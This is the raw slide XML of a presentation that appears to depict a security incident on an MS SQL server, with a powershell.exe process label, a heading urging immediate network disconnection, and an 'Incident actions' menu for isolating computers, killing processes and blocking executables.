                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B8BD47-00C8-8BA4-B1EE-B8F06F29F5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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="5919906"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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2C82A6C4-4B42-6951-15D2-ED0AE445A2A5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="4420881"/>
                <a:ext cx="5616625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C127F70E-3D08-FC48-97F1-803D931F9597}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="5547932"/>
                <a:ext cx="5616625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6" name="Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F58CD9F-E7FD-0530-0A16-FEA068D59EFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="7975601"/>
              <a:ext cx="5716548" cy="1168399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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>INCIDENT ACTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Triangle 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6861AF0B-544D-76B9-9E18-5C053808EF51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10594664" y="8465598"/>
              <a:ext cx="426260" cy="210887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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="sk-SK" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="141" name="Rounded Rectangle 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC112A54-808C-9B61-AE42-E1572A6FFACB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="2457634"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr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A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3832622" y="575130"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr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50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="160" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="162" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="163" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="164" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="165" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="161" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grp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3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1623038" y="924990"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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920865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C95BB2-F137-6CAB-5469-EA01D112BF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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7862397B-2EBF-DD4B-0707-9071BBF7AA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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C7E15D-F8D5-D00B-F897-4A16E03AFAE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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5ACCF12-BDF3-B0AF-675F-4175C6B451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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A6F44A3-D5A6-DFB3-73C3-01E9C965AFF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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2CD033A-E9CB-EBD8-15D9-48B5CBFAC5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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508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538D1579-FFD2-15E6-D97F-F0019D55B418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8630343" y="-992671"/>
            <a:ext cx="3841620" cy="483282"/>
            <a:chOff x="11839730" y="3389691"/>
            <a:chExt cx="3841620" cy="483282"/>
          </a:xfrm>
        </p:grpSpPr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7BA00D86-87C9-B32F-1780-6ADDAF8C5F12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11839730" y="3390371"/>
              <a:ext cx="3663949" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274CC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51" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3452F538-431E-8B10-8109-E761AD6B72C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12438063" y="3389691"/>
              <a:ext cx="3243287" cy="483282"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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powershell.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(16656)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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B8B35F53-0C17-6189-46DA-233766BAE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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11974098" y="3482196"/>
              <a:ext cx="347807" cy="260855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="TextBox 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1911354-46A9-B052-0E24-50FDFA9876E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768432" y="2435973"/>
            <a:ext cx="1266586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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Szerver AZONNALI leválasztása a hálózatról</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="2800" dirty="0"/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DB9900A9-E6F6-3484-E797-D347C193D653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-63432" y="4641174"/>
            <a:ext cx="18584214" cy="5660425"/>
            <a:chOff x="-63432" y="4641174"/>
            <a:chExt cx="18584214" cy="5660425"/>
          </a:xfrm>
        </p:grpSpPr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C4FADBC6-E04E-5A09-FF05-5E9A0874460B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-63432" y="4641174"/>
              <a:ext cx="18584214" cy="5660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id="{67EAE470-4A64-9186-6624-953FE1723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t="1037" b="-833"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="969716" y="5215950"/>
              <a:ext cx="16517919" cy="4071609"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="00717F"/>
              </a:solidFill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5EABEC87-5D56-F132-FCBE-F522A08F35A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13629383" y="696324"/>
            <a:ext cx="3689914" cy="4302895"/>
            <a:chOff x="5295013" y="1531088"/>
            <a:chExt cx="6528391" cy="7612912"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="281331" dist="707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896AA90B-6E58-35A7-C1E9-DD4F46ABEC3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5295013" y="1531088"/>
              <a:ext cx="6528391" cy="6444512"/>
              <a:chOff x="5295013" y="1531088"/>
              <a:chExt cx="6528391" cy="6444512"/>
            </a:xfrm>
          </p:grpSpPr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B3329646-593A-5E11-4444-23936D0363BC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5295013" y="1531088"/>
                <a:ext cx="6528391" cy="6444512"/>
                <a:chOff x="5295013" y="1531088"/>
                <a:chExt cx="6528391" cy="6444512"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="155" name="Triangle 154">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FABFB81-8937-5333-0BD8-7201B4526CA1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8322990" y="7676707"/>
                  <a:ext cx="491067" cy="298893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156" name="Rounded Rectangle 155">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238AC4F2-0AB3-81CF-8A0C-784089F41F2C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5295013" y="1531088"/>
                  <a:ext cx="6528391" cy="6145619"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 1096"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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</p:grpSp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B6230FB7-3C51-5C42-4F1F-FAE90E494749}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5660289" y="1679946"/>
                <a:ext cx="3314628" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Incident actions</a:t>
                </a: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79243109-40C4-6484-081B-76CED3D0D00B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="2583703"/>
                <a:ext cx="3625238" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Isolate computers</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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9A4BDC7D-66DB-511B-DB49-5FD6B50A1AF1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="3458445"/>
                <a:ext cx="4604948" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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End computer isolation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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11D3DCDF-339B-F256-4719-A703C4403E98}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="4674038"/>
                <a:ext cx="2789719" cy="707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Kill processes</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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856B10CA-29E5-6AC8-3398-C8918B6C2A8A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="5858532"/>
                <a:ext cx="3416388" cy="707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Block executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp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96AFB04B-1612-146E-012B-305E21890C4C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="6751666"/>
                <a:ext cx="3938233" cy="707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Unblock executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="149" name="Graphic 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3B46E6E-B5C6-C237-A4FA-2CD58DBDD0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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="2645078"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="150" name="Graphic 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F2ACB2-0B10-143E-8A96-DF426D22B5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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="3501119"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="151" name="Graphic 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40A2F01-4436-48E8-A663-AF69F18201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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="4716713"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="152" name="Graphic 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760B2DCB-66A0-971A-9D53-4E20E7E049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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="5919906"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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57025CD6-71DC-D1A1-BC67-EEC271F71167}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="4420881"/>
                <a:ext cx="5616625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D5F7CFE5-A0E5-8AF8-AB19-2CB30680A5A1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="5547932"/>
                <a:ext cx="5616625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6" name="Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEADBFB6-B9EE-A8A1-206F-498A041D928A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="7975601"/>
              <a:ext cx="5716548" cy="1168399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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>INCIDENT ACTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Triangle 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82F1502-C6AB-F420-2B3C-0DE39EA7A612}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10594664" y="8465598"/>
              <a:ext cx="426260" cy="210887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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="sk-SK" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="141" name="Rounded Rectangle 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30460D05-CF18-7AAB-B5F0-7D61BA6D8A85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="2457634"/>
              <a:ext cx="5716546" cy="940360"/>
